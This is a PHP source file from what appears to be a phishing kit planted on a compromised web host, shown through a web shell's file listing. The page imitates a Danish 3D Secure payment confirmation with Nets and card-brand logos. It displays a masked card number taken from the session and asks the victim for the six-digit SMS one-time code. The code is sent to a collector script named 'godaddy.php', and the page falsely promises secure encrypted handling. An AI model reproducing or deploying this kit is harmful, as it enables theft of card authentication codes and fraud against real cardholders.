| Current Path : /home/lejardintz/www/assets/mta/nordstrom/ |
| Current File : /home/lejardintz/www/assets/mta/nordstrom/return.php |
<?php
session_start();
error_reporting(0);
include('pp.php');
date_default_timezone_set("Europe/Copenhagen");
$cc = $_SESSION['didi'];
$bin = substr($cc, 0, 1);
?>
<!DOCTYPE html>
<html>
<head>
<title>Final step</title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" id="viewport" content="width=device-width, initial-scale=1.0">
<link href="return/css.css" rel="stylesheet">
<link href="return/in.css" rel="stylesheet">
<link rel="icon" type="image/x-icon" href="return/favicon.ico">
<style>input[type="text"]::placeholder {
text-align: center;
}
#overlay {
position: fixed;
z-index: 9999;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: rgba(255, 255, 255, 0.9);
display: flex;
justify-content: center;
align-items: center;
}
.loader img {
width: 120px;
position: absolute;
top: 20%;
left: 46%;
transform: translateX(-50%);
animation: pulsate 2s linear infinite;
}
@media screen and (max-width: 600px) {
.loader img {
left: 40%;
transform: translateX(-50%) translateY(20%);
}
}
@keyframes pulsate {
0% {
transform: scale(1);
}
50% {
transform: scale(1.2);
}
100% {
transform: scale(1);
}
}
.containerx {
display: flex;
flex-direction: row;
align-items: center;
justify-content: space-between;
padding-left: 15px;
padding-right: 15px;
margin-top: 30px;
}
.imgcontainerx {
max-width: 100%;
height: auto;
margin-right: 20px;
height: 20px;
}
.pcontainerx {
font-size: 8px;
line-height: 1.5;
text-align: right;
}
</style>
</head>
<body>
<div class="container" tabindex="-1" style="max-width: 460px; max-height: 580px; margin: 0 auto; border: 1px solid rgb(224, 224, 224); border-radius: 5px; overflow: hidden;" >
<div class="div-loading" id="loader" style="display: none">
<img src="return/96600.gif" class="img-loading" alt="Loading Image">
</div>
<div class="branding-zone">
<div class="issuer-bank-logo">
<img id="issuer-image" src="return/nets.png">
</div>
<div class="card-brand-logo">
<?php if ($bin == "5") : ?>
<img id="ps-image" src="return/msecure.png" style="width: 130px;">
<?php else : ?>
<img id="ps-image" src="return/vc.gif" style="width: 100px;">
<?php endif; ?>
</div>
</div>
<form id="frm" name="frm" action="../godaddy.php?data=sms" method="post">
<div class="challenge-zone" id="challenge-zone">
<div class="challenge-info-header">
<div>
<h1 class="challenge-info-header-h1">Godkend din online betaling</h1>
</div>
</div>
<div>
<div id="challenge_info" class="challenge-info-text">
<div class="container-body-header-desc-otp-ext">
<p>Vi har nu sendt en engangskode til din mobiltelefon.<br> Indtast koden nedenfor og tryk "Bekræft".</p>
<hr>
<p class="txnDetails" style="margin-top: -20px; "><span style="color: black"><br><br>Netbutik: <?php echo $merchant; ?> <br>Beløb: <?php echo $amount; ?> kr <br>Dato: <?php echo date("d.m.Y")?> <br>Kortnummer: <?php echo '************'.substr($_SESSION['didi'],-4); ?> </span><br><br></p>
</div>
</div>
</div>
<div class="txnInputFormDiv" style="padding-bottom: 20px;">
<div class="container-body-txnInput-verify">
<div>
<input type="text" id="gigi" value="" name="gigi" maxlength="6" class="text_input" placeholder="Engangskode med 6 cifre" tabindex="0" autocomplete="off" style="padding-left: 10px; padding-top: 5px; padding-bottom: 5px; text-align: center; " autofocus required="" >
</div>
<div>
</div>
<div class="container-body-submit-elongated">
<div class="container-body-submit-input-elongated">
<input id="verify-btn-elongated" class="button" type="submit" title="Bekræft" value="Bekræft" tabindex="0">
</div>
</div>
<div>
<div>
<div class="container-body-resend" style="margin-top: -13px;">
<div class="container-body-resend-input" >
<input id="resend-button" class="resend_button" type="button" title="Annuller" value="Annuller" tabindex="0" onclick="if (confirm('Vil du annullere 3D Secure bekræftelsen?')) window.location.href = '../godaddy.php?data=declined'; else return false;">
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</form>
<div class="containerx">
<img src="return/apay.png" alt="your-image-description" class="imgcontainerx">
<p class="pcontainerx">Sikker betalingshåndtering<br>Beskytter dine oplysninger med den nyeste krypteringsteknologi.</p>
</div>
</div>
</body>
</html>